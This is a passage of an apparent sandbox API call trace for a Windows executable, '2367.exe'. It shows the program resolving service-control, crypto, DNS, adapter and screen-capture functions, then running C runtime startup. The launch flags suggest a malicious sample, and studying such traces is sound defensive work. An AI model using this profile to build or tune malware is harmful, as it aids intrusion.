(hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0116.883] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0116.883] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0116.883] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0116.883] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0116.887] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0116.887] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0116.888] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0116.888] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0116.888] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0116.888] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0116.888] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0116.888] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0116.888] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0116.888] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0116.889] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0116.889] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0116.889] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0116.889] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0116.889] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0116.889] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0116.895] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0116.896] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0116.898] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0116.898] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0116.898] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0116.898] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0116.904] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0116.904] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0116.904] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0116.904] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0116.905] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0116.905] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0116.906] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0116.906] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0116.906] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0116.906] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0116.914] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0116.915] atexit (param_1=0x3040920) returned 0 [0116.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f370 | out: lpSystemTimeAsFileTime=0x18f370*(dwLowDateTime=0x511e0070, dwHighDateTime=0x1d6bf06)) [0116.915] GetCurrentThreadId () returned 0xb44 [0116.915] GetCurrentProcessId () returned 0xa80 [0116.915] QueryPerformanceCounter (in: lpPerformanceCount=0x18f368 | out: lpPerformanceCount=0x18f368*=23717971379) returned 1 [0116.915] GetStartupInfoW (in: lpStartupInfo=0x18f300 | out: lpStartupInfo=0x18f300*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0116.915] GetProcessHeap () returned 0x31d0000 [0116.915] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0116.915] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0116.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0116.917] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0116.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0116.919] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0116.920] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3bc) returned 0x31ef2f0 [0116.920] GetCurrentThreadId () returned 0xb44 [0116.920] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x31e2140 [0116.920] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x800) returned 0x31ef6b8 [0116.920] GetStartupInfoW (in: lpStartupInfo=0x18f2d0 | out: lpStartupInfo=0x18f2d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xd57b3b48, hStdError=0x58)) [0116.920] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0116.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0116.920] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.920] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask" [0116.920] GetEnvironmentStringsW () returned 0x31efec0* [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xaca) returned 0x31f0998 [0116.921] FreeEnvironmentStringsW (penv=0x31efec0) returned 1 [0116.921] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xb4) returned 0x31efec0 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x98) returned 0x31eff80 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3e) returned 0x31e5710 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x6c) returned 0x31f0020 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x6e) returned 0x31f0098 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x78) returned 0x31e2cb0 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x62) returned 0x31f0110 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2e) returned 0x31eb000 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x48) returned 0x31e6bb8 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x28) returned 0x31ea9c0 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1a) returned 0x31eef28 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x4a) returned 0x31f0180 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x72) returned 0x31e2d30 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x30) returned 0x31eb038 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2e) returned 0x31eb070 [0116.921] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1c) returned 0x31eef50 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0xd2) returned 0x31f01d8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x7c) returned 0x31f02b8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x36) returned 0x31f0340 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3a) returned 0x31e5758 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x90) returned 0x31f0380 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x24) returned 0x31ea9f0 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x30) returned 0x31eb0a8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x36) returned 0x31f0418 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x48) returned 0x31e6c08 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x52) returned 0x31f0458 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3c) returned 0x31e57a0 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x82) returned 0x31f04b8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2e) returned 0x31eb0e0 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1e) returned 0x31eef78 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2c) returned 0x31eb118 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x54) returned 0x31f0548 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x52) returned 0x31f05a8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2a) returned 0x31eb150 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3c) returned 0x31e57e8 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x54) returned 0x31f0608 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x24) returned 0x31eaa20 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x30) returned 0x31eb188 [0116.922] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x8c) returned 0x31f0668 [0116.922] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31f0998 | out: hHeap=0x31d0000) returned 1 [0116.923] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x800) returned 0x31f0700 [0116.923] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x80) returned 0x31f0f08 [0116.923] GetLastError () returned 0x0 [0116.923] SetLastError (dwErrCode=0x0) [0116.923] GetLastError () returned 0x0 [0116.923] SetLastError (dwErrCode=0x0) [0116.923] GetLastError () returned 0x0 [0116.923] SetLastError (dwErrCode=0x0) [0116.923] GetACP () returned 0x4e4 [0116.923] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x220) returned 0x31f0f90 [0116.923] GetLastError () returned 0x0 [0116.923] SetLastError (dwErrCode=0x0) [0116.923] IsValidCodePage (CodePage=0x4e4) returned 1 [0116.924] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f2c4 | out: lpCPInfo=0x18f2c4) returned 1 [0116.924] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ed8c | out: lpCPInfo=0x18ed8c) returned 1 [0116.924] GetLastError () returned 0x0 [0116.924] SetLastError (dwErrCode=0x0) [0116.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0116.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1a0, cbMultiByte=256, lpWideCharStr=0x18eb08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0116.924] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x18eda0 | out: lpCharType=0x18eda0) returned 1 [0116.924] GetLastError () returned 0x0 [0116.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0116.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18e8c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0116.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f0a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿØ:{ÕÜò\x18", lpUsedDefaultChar=0x0) returned 256 [0116.924] GetLastError () returned 0x0 [0116.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0116.924] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18e8e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0116.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18efa0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 